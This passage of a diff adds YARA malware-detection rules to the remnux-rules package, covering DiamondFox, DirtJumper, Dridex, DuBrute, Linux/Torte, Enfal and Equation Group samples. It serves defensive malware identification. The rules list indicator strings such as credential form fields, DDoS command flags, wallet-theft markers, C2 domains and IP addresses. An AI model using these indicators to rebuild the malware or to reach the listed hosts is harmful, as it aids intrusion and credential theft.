+        $s1 = "UpdateMutex:"
+        $s2 = "response="
+        $s3 = "page="
+        $s4 = "scanin:"
+    condition:
+        all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/DiamondFox.yar remnux-rules-0.0.4/yara/malware/DiamondFox.yar
--- remnux-rules-0.0.3/yara/malware/DiamondFox.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/DiamondFox.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,21 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as
+    long as you use it under this license.
+*/
+rule diamond_fox
+{
+    meta:
+        author = "Brian Wallace @botnet_hunter"
+        author_email = "bwall@ballastsecurity.net"
+        date = "2015-08-22"
+        description = "Identify DiamondFox"
+    strings:
+    	$s1 = "UPDATE_B"
+        $s2 = "UNISTALL_B"
+        $s3 = "S_PROTECT"
+        $s4 = "P_WALLET"
+        $s5 = "GR_COMMAND"
+        $s6 = "FTPUPLOAD"
+    condition:
+    	all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/DirtJumper.yar remnux-rules-0.0.4/yara/malware/DirtJumper.yar
--- remnux-rules-0.0.3/yara/malware/DirtJumper.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/DirtJumper.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,85 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as
+    long as you use it under this license.
+*/
+
+rule DirtJumper_drive
+{
+    meta:
+        author = "Jason Jones <jasonjones@arbor.net>"
+        date = "2013-08-26"
+        description = "Identify first version of drive DDoS malware"
+        source = "https://github.com/arbor/yara/blob/master/drive.yara"
+    strings:
+        $cmd1 = "-get" fullword
+        $cmd2 = "-ip" fullword
+        $cmd3 = "-ip2" fullword
+        $cmd4 = "-post1" fullword
+        $cmd5 = "-post2" fullword
+        $cmd6 = "-udp" fullword
+        $str1 = "login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]"
+        $str2 = "-timeout" fullword
+        $str3 = "-thread" fullword
+        $str4 = " Local; ru) Presto/2.10.289 Version/"
+        $str5 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT"
+        $newver1 = "-icmp"
+        $newver2 = "<xmp>"
+    condition:
+        4 of ($cmd*) and all of ($str*) and not any of ($newver*)
+}
+
+
+rule DirtJumper_drive2
+{
+    meta:
+        author = "Jason Jones <jasonjones@arbor.net>"
+        date = "2013-08-26"
+        description = "Identify newer version of drive DDoS malware"
+        source = "https://github.com/arbor/yara/blob/master/drive2.yara"
+    strings:
+        $cmd1 = "-get" fullword
+        $cmd2 = "-ip" fullword
+        $cmd3 = "-ip2" fullword
+        $cmd4 = "-post1" fullword
+        $cmd5 = "-post2" fullword
+        $cmd6 = "-udp" fullword
+        $str1 = "login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]"
+        $str2 = "-timeout" fullword
+        $str3 = "-thread" fullword
+        $str4 = " Local; ru) Presto/2.10.289 Version/"
+        $str5 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT"
+        $newver1 = "-icmp"
+        $newver2 = "-byte"
+        $newver3 = "-long"
+        $newver4 = "<xmp>"
+    condition:
+        4 of ($cmd*) and all of ($str*) and all of ($newver*)
+}
+
+
+rule DirtJumper_drive3
+{
+    meta:
+        author = "Jason Jones <jasonjones@arbor.net>"
+        date = "2014-03-17"
+        description = "Identify version of Drive DDoS malware using compromised sites"
+        source = "https://github.com/arbor/yara/blob/master/drive3.yara"
+    strings:
+        $cmd1 = "-get" fullword
+        $cmd2 = "-ip" fullword
+        $cmd3 = "-ip2" fullword
+        $cmd4 = "-post1" fullword
+        $cmd5 = "-post2" fullword
+        $cmd6 = "-udp" fullword
+        $str1 = "login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]"
+        $str2 = "-timeout" fullword
+        $str3 = "-thread" fullword
+        $str4 = " Local; ru) Presto/2.10.289 Version/"
+        $str5 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT"
+        $newver1 = "-icmp"
+        $newver2 = "-byte"
+        $newver3 = "-long"
+        $drive3 = "99=1"
+    condition:
+        4 of ($cmd*) and all of ($str*) and all of ($newver*) and $drive3
+}
\ No newline at end of file
diff -Nru remnux-rules-0.0.3/yara/malware/DRIDEX_phish_gina_dec15.yar remnux-rules-0.0.4/yara/malware/DRIDEX_phish_gina_dec15.yar
--- remnux-rules-0.0.3/yara/malware/DRIDEX_phish_gina_dec15.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/DRIDEX_phish_gina_dec15.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,48 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+/*
+	Yara Rule Set
+	Author: Florian Roth
+	Date: 2015-12-02
+	Identifier: Phishing Gina Harrowell Dez 2015
+*/
+
+rule PHISH_02Dez2015_dropped_p0o6543f {
+	meta:
+		description = "Phishing Wave - file p0o6543f.exe"
+		author = "Florian Roth"
+		reference = "http://myonlinesecurity.co.uk/purchase-order-124658-gina-harrowell-clinimed-limited-word-doc-or-excel-xls-spreadsheet-malware/"
+		date = "2015-12-02"
+		hash = "db788d6d3a8ed1a6dc9626852587f475e7671e12fa9c9faa73b7277886f1e210"
+	strings:
+		$s1 = "netsh.exe" fullword wide
+		$s2 = "routemon.exe" fullword wide
+		$s3 = "script=" fullword wide /* Goodware String - occured 4 times */
+		$s4 = "disconnect" fullword wide /* Goodware String - occured 14 times */
+		$s5 = "GetClusterResourceTypeKey" fullword ascii /* Goodware String - occured 17 times */
+		$s6 = "QueryInformationJobObject" fullword ascii /* Goodware String - occured 34 times */
+		$s7 = "interface" fullword wide /* Goodware String - occured 52 times */
+		$s8 = "connect" fullword wide /* Goodware String - occured 61 times */
+		$s9 = "FreeConsole" fullword ascii /* Goodware String - occured 91 times */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 250KB and all of them
+}
+
+rule PHISH_02Dez2015_attach_P_ORD_C_10156_124658 {
+	meta:
+		description = "Phishing Wave - file P-ORD-C-10156-124658.xls"
+		author = "Florian Roth"
+		reference = "http://myonlinesecurity.co.uk/purchase-order-124658-gina-harrowell-clinimed-limited-word-doc-or-excel-xls-spreadsheet-malware/"
+		date = "2015-12-02"
+		hash = "bc252ede5302240c2fef8bc0291ad5a227906b4e70929a737792e935a5fee209"
+	strings:
+		$s1 = "Execute" ascii
+		$s2 = "Process WriteParameterFiles" fullword ascii
+		$s3 = "WScript.Shell" fullword ascii
+		$s4 = "STOCKMASTER" fullword ascii
+		$s5 = "InsertEmailFax" ascii
+	condition:
+		uint16(0) == 0xcfd0 and filesize < 200KB and all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Dridex.yar remnux-rules-0.0.4/yara/malware/Dridex.yar
--- remnux-rules-0.0.3/yara/malware/Dridex.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Dridex.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,29 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Dridex_Trojan_XML {
+	meta:
+		description = "Dridex Malware in XML Document"
+		author = "Florian Roth @4nc4p"
+		reference = "https://threatpost.com/dridex-banking-trojan-spreading-via-macros-in-xml-files/111503"
+		date = "2015/03/08"
+		hash1 = "88d98e18ed996986d26ce4149ae9b2faee0bc082"
+		hash2 = "3b2d59adadf5ff10829bb5c27961b22611676395"
+		hash3 = "e528671b1b32b3fa2134a088bfab1ba46b468514"
+		hash4 = "981369cd53c022b434ee6d380aa9884459b63350"
+		hash5 = "96e1e7383457293a9b8f2c75270b58da0e630bea"
+	strings:
+		// can be ascii or wide formatted - therefore no restriction
+		$c_xml      = "<?xml version="
+		$c_word     = "<?mso-application progid=\"Word.Document\"?>"
+		$c_macro    = "w:macrosPresent=\"yes\""
+		$c_binary   = "<w:binData w:name="
+		$c_0_chars  = "<o:Characters>0</o:Characters>"
+		$c_1_line   = "<o:Lines>1</o:Lines>"
+	condition:
+		all of ($c*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/dubrute.yar remnux-rules-0.0.4/yara/malware/dubrute.yar
--- remnux-rules-0.0.3/yara/malware/dubrute.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/dubrute.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,26 @@
+rule dubrute : bruteforcer
+{
+    meta:
+        author = "Christian Rebischke (@sh1bumi)"
+        date = "2015-09-05"
+        description = "Rules for DuBrute Bruteforcer"
+        in_the_wild = true
+        family = "Hackingtool/Bruteforcer"
+    
+    strings:
+        $a = "WBrute"
+        $b = "error.txt"
+        $c = "good.txt"
+        $d = "source.txt"
+        $e = "bad.txt"
+        $f = "Generator IP@Login;Password"
+
+    condition:
+        //check for MZ Signature at offset 0
+        uint16(0) == 0x5A4D 
+
+        and 
+
+        //check for dubrute specific strings
+        $a and $b and $c and $d and $e and $f 
+}
diff -Nru remnux-rules-0.0.3/yara/malware/ELF_Linux_Torte.yar remnux-rules-0.0.4/yara/malware/ELF_Linux_Torte.yar
--- remnux-rules-0.0.3/yara/malware/ELF_Linux_Torte.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/ELF_Linux_Torte.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,61 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as
+    long as you use it under this license.
+*/
+
+
+private rule is__elf
+{
+    meta:
+		author = "@mmorenog,@yararules"
+		
+    strings:
+        $header = { 7F 45 4C 46 }
+
+    condition:
+        $header at 0
+}
+
+rule ELF_Linux_Torte
+
+{
+    meta:
+		author = "@mmorenog,@yararules"
+		description = "Detects ELF Linux/Torte infection"
+		ref = "http://blog.malwaremustdie.org/2016/01/mmd-0050-2016-incident-report-elf.html"
+		hash1 = "1faf27f6b8e8a9cadb611f668a01cf73"
+		hash2 = "cb0477445fef9c5f1a5b6689bbfb941e"
+
+    strings:
+        $s0 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6)"
+        $s1 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
+        $s2 = "?sessd="
+        $s3 = "&sessc="
+        $s4 = "&sessk="
+        $s5 = "3a08fe7b8c4da6ed09f21c3ef97efce2"
+        $s6 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
+        $s7 = "_ZN11CThreadPool10getBatchesERSt6vectorISt4pairISsiESaIS2_EE"
+        $s8 = "_ZNSs4_Rep10_M_destroyERKSaIcE@@GLIBCXX_3.4"
+        $s9 = "_ZNSt6vectorImSaImEE13_M_insert_auxEN9__gnu_cxx17__normal_iteratorIPmS1_EERKm"
+        $s10 = "_ZNSt6vectorISt4pairISsiESaIS1_EE13_M_insert_auxEN9__gnu_cxx17__normal_iteratorIPS1_S3_EERKS1_"
+        $s11 = "_ZSt20__throw_out_of_rangePKc@@GLIBCXX_3.4"
+        
+        condition:
+        is__elf and all of ($s*)
+}
+
+
+rule ELF_Linux_Torte_domains {
+	meta:
+		author = "@mmorenog,@yararules"
+		description = "Detects ELF Linux/Torte infection"
+		ref1 = "http://blog.malwaremustdie.org/2016/01/mmd-0050-2016-incident-report-elf.html"
+	strings:
+		$1 = "pages.touchpadz.com" ascii wide nocase
+		$2 = "bat.touchpadz.com" ascii wide nocase
+		$3 = "stat.touchpadz.com" ascii wide nocase
+		$4 = "sk2.touchpadz.com" ascii wide nocase
+
+	condition:
+		any of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Enfal.yar remnux-rules-0.0.4/yara/malware/Enfal.yar
--- remnux-rules-0.0.3/yara/malware/Enfal.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Enfal.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,152 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule EnfalCode : Enfal Family 
+{
+    meta:
+        description = "Enfal code tricks"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    strings:
+        // mov al, 20h; sub al, bl; add [ebx+esi], al; push esi; inc ebx; call edi; cmp ebx, eax
+        $decrypt = { B0 20 2A C3 00 04 33 56 43 FF D7 3B D8 }
+        
+    condition:
+        any of them
+}
+
+rule EnfalStrings : Enfal Family
+{
+    meta:
+        description = "Enfal Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    strings:
+        $ = "D:\\work\\\xe6\xba\x90\xe5\x93\xa5\xe5\x85\x8d\xe6\x9d\x80\\tmp\\Release\\ServiceDll.pdb"
+        $ = "e:\\programs\\LuridDownLoader"
+        $ = "LuridDownloader for Falcon"
+        $ = "DllServiceTrojan"
+        $ = "\\k\\\xe6\xa1\x8c\xe8\x9d\xa2\\"
+        $ = "EtenFalcon\xef\xbc\x88\xe4\xbf\xae\xe6\x94\xb9\xef\xbc\x89"
+        $ = "Madonna\x00Jesus"
+        $ = "/iupw82/netstate"
+        $ = "fuckNodAgain"
+        $ = "iloudermao"
+        $ = "Crpq2.cgi"
+        $ = "Clnpp5.cgi"
+        $ = "Dqpq3ll.cgi"
+        $ = "dieosn83.cgi"
+        $ = "Rwpq1.cgi"
+        $ = "/Ccmwhite"
+        $ = "/Cmwhite"
+        $ = "/Crpwhite"
+        $ = "/Dfwhite"
+        $ = "/Query.txt"
+        $ = "/Ufwhite"
+        $ = "/cgl-bin/Clnpp5.cgi"
+        $ = "/cgl-bin/Crpq2.cgi"
+        $ = "/cgl-bin/Dwpq3ll.cgi"
+        $ = "/cgl-bin/Owpq4.cgi"
+        $ = "/cgl-bin/Rwpq1.cgi"
+        $ = "/trandocs/mm/"
+        $ = "/trandocs/netstat"
+        $ = "NFal.exe"
+        $ = "LINLINVMAN"
+        $ = "7NFP4R9W"
+        
+    condition:
+        any of them
+}
+
+rule Enfal : Family
+{
+    meta:
+        description = "Enfal"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    condition:
+        EnfalCode or EnfalStrings
+}
+
+
+rule Enfal_Malware {
+	meta:
+		description = "Detects a certain type of Enfal Malware"
+		author = "Florian Roth"
+		reference = "not set"
+		date = "2015/02/10"
+		hash = "9639ec9aca4011b2724d8e7ddd13db19913e3e16"
+		score = 60
+	strings:
+		$s0 = "POWERPNT.exe" fullword ascii
+		$s1 = "%APPDATA%\\Microsoft\\Windows\\" fullword ascii
+		$s2 = "%HOMEPATH%" fullword ascii
+		$s3 = "Server2008" fullword ascii
+		$s4 = "Server2003" fullword ascii
+		$s5 = "Server2003R2" fullword ascii
+		$s6 = "Server2008R2" fullword ascii
+		$s9 = "%HOMEDRIVE%" fullword ascii
+		$s13 = "%ComSpec%" fullword ascii
+	condition:
+		all of them
+}
+
+rule Enfal_Malware_Backdoor {
+	meta:
+		description = "Generic Rule to detect the Enfal Malware"
+		author = "Florian Roth"
+		date = "2015/02/10"
+		super_rule = 1
+		hash0 = "6d484daba3927fc0744b1bbd7981a56ebef95790"
+		hash1 = "d4071272cc1bf944e3867db299b3f5dce126f82b"
+		hash2 = "6c7c8b804cc76e2c208c6e3b6453cb134d01fa41"
+		score = 60
+	strings:
+		$mz = { 4d 5a }
+			
+		$x1 = "Micorsoft Corportation" fullword wide
+		$x2 = "IM Monnitor Service" fullword wide
+		
+		$s1 = "imemonsvc.dll" fullword wide
+		$s2 = "iphlpsvc.tmp" fullword
+		
+		$z1 = "urlmon" fullword
+		$z2 = "Registered trademarks and service marks are the property of their respec" wide		
+		$z3 = "XpsUnregisterServer" fullword
+		$z4 = "XpsRegisterServer" fullword
+		$z5 = "{53A4988C-F91F-4054-9076-220AC5EC03F3}" fullword
+	condition:
+		( $mz at 0 ) and 
+		( 
+			1 of ($x*) or 
+			( all of ($s*) and all of ($z*) )
+		)
+}
+rule ce_enfal_cmstar_debug_msg
+{
+    meta:
+        Author      = "rfalcone"
+        Date        = "2015.05.10"
+        Description = "Detects the static debug strings within CMSTAR"
+        Reference   = "http://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin"
+
+    strings:
+        $d1 = "EEE\x0d\x0a" fullword
+        $d2 = "TKE\x0d\x0a" fullword
+        $d3 = "VPE\x0d\x0a" fullword
+        $d4 = "VPS\x0d\x0a" fullword
+        $d5 = "WFSE\x0d\x0a" fullword
+        $d6 = "WFSS\x0d\x0a" fullword
+        $d7 = "CM**\x0d\x0a" fullword
+
+    condition:
+        uint16(0) == 0x5a4d and all of ($d*)
+}
+
diff -Nru remnux-rules-0.0.3/yara/malware/Equation.yar remnux-rules-0.0.4/yara/malware/Equation.yar
--- remnux-rules-0.0.3/yara/malware/Equation.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Equation.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,582 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+/* Equation APT ------------------------------------------------------------ */
+
+rule apt_equation_exploitlib_mutexes {
+    meta:
+        copyright = "Kaspersky Lab"
+        description = "Rule to detect Equation group's Exploitation library http://goo.gl/ivt8EW"
+        version = "1.0"
+        last_modified = "2015-02-16"
+        reference = "http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/"
+    strings:
+        $mz="MZ"
+        $a1="prkMtx" wide
+        $a2="cnFormSyncExFBC" wide
+        $a3="cnFormVoidFBC" wide
+        $a4="cnFormSyncExFBC"
+        $a5="cnFormVoidFBC"
+    condition:
+        (($mz at 0) and any of ($a*))
+}
+
+rule apt_equation_doublefantasy_genericresource {
+    meta:
+        copyright = "Kaspersky Lab"
+        description = "Rule to detect DoubleFantasy encoded config http://goo.gl/ivt8EW"
+        version = "1.0"
+        last_modified = "2015-02-16"
+        reference = "http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/"
+    strings:
+        $mz="MZ"
+        $a1={06 00 42 00 49 00 4E 00 52 00 45 00 53 00}
+        $a2="yyyyyyyyyyyyyyyy"
+        $a3="002"
+    condition:
+        (($mz at 0) and all of ($a*)) and filesize < 500000
+}
+
+rule apt_equation_equationlaser_runtimeclasses {
+	meta:
+	    copyright = "Kaspersky Lab"
+	    description = "Rule to detect the EquationLaser malware"
+	    version = "1.0"
+	    last_modified = "2015-02-16"
+	    reference = "https://securelist.com/blog/"
+	strings:
+	    $a1="?a73957838_2@@YAXXZ"
+	    $a2="?a84884@@YAXXZ"
+	    $a3="?b823838_9839@@YAXXZ"
+	    $a4="?e747383_94@@YAXXZ"
+	    $a5="?e83834@@YAXXZ"
+	    $a6="?e929348_827@@YAXXZ"
+	condition:
+	    any of them
+}
+
+rule apt_equation_cryptotable {
+	meta:
+	    copyright = "Kaspersky Lab"
+	    description = "Rule to detect the crypto library used in Equation group malware"
+	    version = "1.0"
+	    last_modified = "2015-02-16"
+	    reference = "https://securelist.com/blog/"
+	strings:
+	    $a={37 DF E8 B6 C7 9C 0B AE 91 EF F0 3B 90 C6 80 85 5D 19 4B 45 44 12 3C E2 0D 5C 1C 7B C4 FF D6 05 17 14 4F 03 74 1E 41 DA 8F 7D DE 7E 99 F1 35 AC B8 46 93 CE 23 82 07 EB 2B D4 72 71 40 F3 B0 F7 78 D7 4C D1 55 1A 39 83 18 FA E1 9A 56 B1 96 AB A6 30 C5 5F BE 0C 50 C1}
+	condition:
+	    $a
+}
+
+/* Equation Group - Kaspersky ---------------------------------------------- */
+
+rule Equation_Kaspersky_TripleFantasy_1 {
+	meta:
+		description = "Equation Group Malware - TripleFantasy http://goo.gl/ivt8EW"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/16"
+		hash = "b2b2cd9ca6f5864ef2ac6382b7b6374a9fb2cbe9"
+	strings:
+		$mz = { 4d 5a }
+
+		$s0 = "%SystemRoot%\\system32\\hnetcfg.dll" fullword wide
+		$s1 = "%WINDIR%\\System32\\ahlhcib.dll" fullword wide
+		$s2 = "%WINDIR%\\sjyntmv.dat" fullword wide
+		$s3 = "Global\\{8c38e4f3-591f-91cf-06a6-67b84d8a0102}" fullword wide
+		$s4 = "%WINDIR%\\System32\\owrwbsdi" fullword wide
+		$s5 = "Chrome" fullword wide
+		$s6 = "StringIndex" fullword ascii
+
+		$x1 = "itemagic.net@443" fullword wide
+		$x2 = "team4heat.net@443" fullword wide
+		$x5 = "62.216.152.69@443" fullword wide
+		$x6 = "84.233.205.37@443" fullword wide
+
+		$z1 = "www.microsoft.com@80" fullword wide
+		$z2 = "www.google.com@80" fullword wide
+		$z3 = "127.0.0.1:3128" fullword wide
+	condition:
+		( $mz at 0 ) and filesize < 300000 and
+		(
+			( all of ($s*) and all of ($z*) ) or
+			( all of ($s*) and 1 of ($x*) )
+		)
+}
+
+rule Equation_Kaspersky_DoubleFantasy_1 {
+	meta:
+		description = "Equation Group Malware - DoubleFantasy"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/16"
+		hash = "d09b4b6d3244ac382049736ca98d7de0c6787fa2"
+	strings:
+		$mz = { 4d 5a }
+
+		$z1 = "msvcp5%d.dll" fullword ascii
+
+		$s0 = "actxprxy.GetProxyDllInfo" fullword ascii
+		$s3 = "actxprxy.DllGetClassObject" fullword ascii
+		$s5 = "actxprxy.DllRegisterServer" fullword ascii
+		$s6 = "actxprxy.DllUnregisterServer" fullword ascii
+
+		$x1 = "yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy" ascii
+		$x2 = "191H1a1" fullword ascii
+		$x3 = "November " fullword ascii
+		$x4 = "abababababab" fullword ascii
+		$x5 = "January " fullword ascii
+		$x6 = "October " fullword ascii
+		$x7 = "September " fullword ascii
+	condition:
+		( $mz at 0 ) and filesize < 350000 and
+		(
+			( $z1 ) or
+			( all of ($s*) and 6 of ($x*) )
+		)
+}
+
+rule Equation_Kaspersky_GROK_Keylogger {
+	meta:
+		description = "Equation Group Malware - GROK keylogger"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/16"
+		hash = "50b8f125ed33233a545a1aac3c9d4bb6aa34b48f"
+	strings:
+		$mz = { 4d 5a }
+		$s0 = "c:\\users\\rmgree5\\" ascii
+		$s1 = "msrtdv.sys" fullword wide
+
+		$x1 = "svrg.pdb" fullword ascii
+		$x2 = "W32pServiceTable" fullword ascii
+		$x3 = "In forma" fullword ascii
+		$x4 = "ReleaseF" fullword ascii
+		$x5 = "criptor" fullword ascii
+		$x6 = "astMutex" fullword ascii
+		$x7 = "ARASATAU" fullword ascii
+		$x8 = "R0omp4ar" fullword ascii
+
+		$z1 = "H.text" fullword ascii
+		$z2 = "\\registry\\machine\\software\\Microsoft\\Windows NT\\CurrentVersion" fullword wide
+		$z4 = "\\registry\\machine\\SYSTEM\\ControlSet001\\Control\\Session Manager\\Environment" wide fullword
+	condition:
+		( $mz at 0 ) and filesize < 250000 and
+		(
+			$s0 or
+			( $s1 and 6 of ($x*) ) or
+			( 6 of ($x*) and all of ($z*) )
+		)
+}
+
+rule Equation_Kaspersky_GreyFishInstaller {
+	meta:
+		description = "Equation Group Malware - Grey Fish"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/16"
+		hash = "58d15d1581f32f36542f3e9fb4b1fc84d2a6ba35"
+	strings:
+		$s0 = "DOGROUND.exe" fullword wide
+		$s1 = "Windows Configuration Services" fullword wide
+		$s2 = "GetMappedFilenameW" fullword ascii
+	condition:
+		all of them
+}
+
+rule Equation_Kaspersky_EquationDrugInstaller {
+	meta:
+		description = "Equation Group Malware - EquationDrug installer LUTEUSOBSTOS"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/16"
+		hash = "61fab1b8451275c7fd580895d9c68e152ff46417"
+	strings:
+		$mz = { 4d 5a }
+
+		$s0 = "\\system32\\win32k.sys" fullword wide
+		$s1 = "ALL_FIREWALLS" fullword ascii
+
+		$x1 = "@prkMtx" fullword wide
+		$x2 = "STATIC" fullword wide
+		$x3 = "windir" fullword wide
+		$x4 = "cnFormVoidFBC" fullword wide
+		$x5 = "CcnFormSyncExFBC" fullword wide
+		$x6 = "WinStaObj" fullword wide
+		$x7 = "BINRES" fullword wide
+	condition:
+		( $mz at 0 ) and filesize < 500000 and all of ($s*) and 5 of ($x*)
+}
+
+rule Equation_Kaspersky_EquationLaserInstaller {
+	meta:
+		description = "Equation Group Malware - EquationLaser Installer"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/16"
+		hash = "5e1f56c1e57fbff96d4999db1fd6dd0f7d8221df"
+	strings:
+		$mz = { 4d 5a }
+		$s0 = "Failed to get Windows version" fullword ascii
+		$s1 = "lsasrv32.dll and lsass.exe" fullword wide
+		$s2 = "\\\\%s\\mailslot\\%s" fullword ascii
+		$s3 = "%d-%d-%d %d:%d:%d Z" fullword ascii
+		$s4 = "lsasrv32.dll" fullword ascii
+		$s5 = "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" fullword ascii
+		$s6 = "%s %02x %s" fullword ascii
+		$s7 = "VIEWERS" fullword ascii
+		$s8 = "5.2.3790.220 (srv03_gdr.040918-1552)" fullword wide
+	condition:
+		( $mz at 0 ) and filesize < 250000 and 6 of ($s*)
+}
+
+rule Equation_Kaspersky_FannyWorm {
+	meta:
+		description = "Equation Group Malware - Fanny Worm"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/16"
+		hash = "1f0ae54ac3f10d533013f74f48849de4e65817a7"
+	strings:
+		$mz = { 4d 5a }
+
+		$s1 = "x:\\fanny.bmp" fullword ascii
+		$s2 = "32.exe" fullword ascii
+		$s3 = "d:\\fanny.bmp" fullword ascii
+
+		$x1 = "c:\\windows\\system32\\kernel32.dll" fullword ascii
+		$x2 = "System\\CurrentControlSet\\Services\\USBSTOR\\Enum" fullword ascii
+		$x3 = "System\\CurrentControlSet\\Services\\PartMgr\\Enum" fullword ascii
+		$x4 = "\\system32\\win32k.sys" fullword wide
+		$x5 = "\\AGENTCPD.DLL" fullword ascii
+		$x6 = "agentcpd.dll" fullword ascii
+		$x7 = "PADupdate.exe" fullword ascii
+		$x8 = "dll_installer.dll" fullword ascii
+		$x9 = "\\restore\\" fullword ascii
+		$x10 = "Q:\\__?__.lnk" fullword ascii
+		$x11 = "Software\\Microsoft\\MSNetMng" fullword ascii
+		$x12 = "\\shelldoc.dll" fullword ascii
+		$x13 = "file size = %d bytes" fullword ascii
+		$x14 = "\\MSAgent" fullword ascii
+		$x15 = "Global\\RPCMutex" fullword ascii
+		$x16 = "Global\\DirectMarketing" fullword ascii
+	condition:
+		( $mz at 0 ) and filesize < 300000 and
+		(
+			( 2 of ($s*) ) or
+			( 1 of ($s*) and 6 of ($x*) ) or
+			( 14 of ($x*) )
+		)
+}
+
+rule Equation_Kaspersky_HDD_reprogramming_module {
+	meta:
+		description = "Equation Group Malware - HDD reprogramming module"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/16"
+		hash = "ff2b50f371eb26f22eb8a2118e9ab0e015081500"
+	strings:
+		$mz = { 4d 5a }
+		$s0 = "nls_933w.dll" fullword ascii
+
+		$s1 = "BINARY" fullword wide
+		$s2 = "KfAcquireSpinLock" fullword ascii
+		$s3 = "HAL.dll" fullword ascii
+		$s4 = "READ_REGISTER_UCHAR" fullword ascii
+	condition:
+		( $mz at 0 ) and filesize < 300000 and all of ($s*)
+}
+
+rule Equation_Kaspersky_EOP_Package {
+	meta:
+		description = "Equation Group Malware - EoP package and malware launcher"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/16"
+		hash = "2bd1b1f5b4384ce802d5d32d8c8fd3d1dc04b962"
+	strings:
+		$mz = { 4d 5a }
+		$s0 = "abababababab" fullword ascii
+		$s1 = "abcdefghijklmnopq" fullword ascii
+		$s2 = "@STATIC" fullword wide
+		$s3 = "$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" fullword ascii
+		$s4 = "@prkMtx" fullword wide
+		$s5 = "prkMtx" fullword wide
+		$s6 = "cnFormVoidFBC" fullword wide
+	condition:
+		( $mz at 0 ) and filesize < 100000 and all of ($s*)
+}
+
+rule Equation_Kaspersky_TripleFantasy_Loader {
+	meta:
+		description = "Equation Group Malware - TripleFantasy Loader"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
